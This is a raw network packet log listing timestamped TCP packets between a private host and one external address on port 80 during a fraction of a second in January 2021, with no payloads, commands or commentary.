Jan 27, 2021 20:03:03.295505047 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.336901903 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.336937904 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.336963892 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.336985111 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.336997986 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.337007999 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.337012053 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.337019920 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.337023020 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.337032080 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.337059021 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.337060928 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.337084055 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.337095022 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.337099075 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.337105989 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.337127924 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.337137938 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.337152004 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.337162971 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.337172031 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.337176085 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.337198973 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.337203026 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.337220907 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.337233067 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.337235928 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.337251902 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.337264061 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.337275982 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.337301970 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.338032007 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.338921070 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380000114 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380055904 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380098104 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380100965 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380136967 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380140066 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380151987 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380177975 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380179882 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380217075 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380233049 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380253077 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380261898 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380295038 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380310059 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380333900 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380358934 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380382061 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380383968 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380434990 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380445004 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380486965 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380487919 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380528927 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380537987 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380567074 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380584002 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380605936 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380641937 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380666971 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380681992 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380705118 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380716085 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380753040 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380759001 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380795956 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380804062 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380834103 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380850077 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380872965 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380882978 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380912066 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380922079 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380949974 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380966902 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.380989075 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.380997896 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.381036043 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.381052017 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.381083965 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.381089926 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.381127119 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.381136894 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.381165028 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.381181955 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.381206989 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.381217957 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.381246090 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.381256104 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.381283045 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.381299019 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.381323099 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.381333113 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.381372929 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.382010937 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.424927950 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.424973965 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425010920 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425019026 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425045967 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425050974 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425060034 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425077915 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425088882 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425110102 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425141096 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425149918 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425160885 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425168991 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425169945 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425203085 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425225019 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425235987 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425242901 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425271988 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425276041 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425309896 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425318003 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425339937 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425343037 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425370932 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425378084 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425429106 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425430059 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425463915 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425471067 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425509930 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425514936 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425546885 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425555944 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425579071 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425594091 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425611973 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425616980 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425651073 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425661087 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425681114 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425683975 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425713062 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425728083 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425744057 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425748110 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425774097 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425801992 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425817966 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425820112 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425848961 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425852060 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425885916 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425888062 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425920963 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425925970 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425951004 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425966978 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.425980091 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.425987005 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.426011086 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.426013947 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.426048994 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.426050901 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.426079988 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.426094055 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.426109076 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.426115990 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.426146030 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.426146984 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.426182985 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.426189899 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.426213026 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.426215887 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.426243067 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.426249981 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.426273108 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.426280022 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.426302910 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.426310062 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.426332951 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.426337004 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.426362991 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.426379919 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.426398039 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.426399946 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.426434040 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.426435947 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.426462889 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.426476955 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.426493883 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.426496983 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.426523924 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.426537991 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.426558018 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.426804066 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.469650030 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.469718933 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.469794035 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.469825029 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.471401930 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.471452951 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.471487999 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.471494913 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.471530914 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.471534967 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.471546888 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.471575975 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.471579075 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.471616030 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.471621990 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.471652031 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.471664906 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.471695900 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.471697092 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.471741915 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.471744061 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.471785069 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.471790075 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.471833944 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.471836090 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.471873045 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.471879005 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.471913099 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.471915007 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.471952915 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.471956015 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.471990108 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.471995115 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472028971 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472032070 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472068071 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472071886 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472115040 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472121954 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472165108 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472167015 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472204924 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472208023 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472244024 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472245932 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472282887 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472295046 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472331047 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472331047 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472371101 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472373962 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472409964 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472415924 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472451925 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472457886 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472500086 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472502947 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472537994 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472543001 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472577095 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472593069 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472615957 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472628117 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472652912 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472666025 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472692966 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472697020 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472731113 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472735882 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472776890 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472778082 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472820044 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472826004 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472856045 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472862005 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472893953 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472907066 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472933054 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472944975 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.472971916 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.472982883 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.473011017 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.473017931 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.473050117 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.473058939 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.473097086 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.473098040 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.473141909 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.473145008 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.473187923 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.473190069 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.473196030 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.473237038 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.473237991 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.473279953 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.473282099 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.473324060 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.480909109 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.481803894 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.510535002 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.510597944 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.510812998 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.514688015 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.514729977 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.514767885 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.514805079 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.514842987 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.514878988 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.514879942 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.514906883 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.514914036 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.514918089 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.514921904 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.514928102 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.514981985 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.516366959 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.516410112 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.516448021 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.516478062 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.516485929 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.516485929 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.516490936 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.516522884 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.516535997 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.516570091 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.516571045 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.516613960 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.516628027 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.516652107 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.516666889 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.516690016 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.516704082 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.516729116 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.516737938 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.516766071 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.516778946 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.516804934 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.516812086 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.516843081 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.516851902 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.516891003 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.516891003 CET	49165	80	192.168.2.22	18.194.54.219
Jan 27, 2021 20:03:03.516933918 CET	80	49165	18.194.54.219	192.168.2.22
Jan 27, 2021 20:03:03.516940117 CET	49165	80	192.168.2.22	18.194.54.219
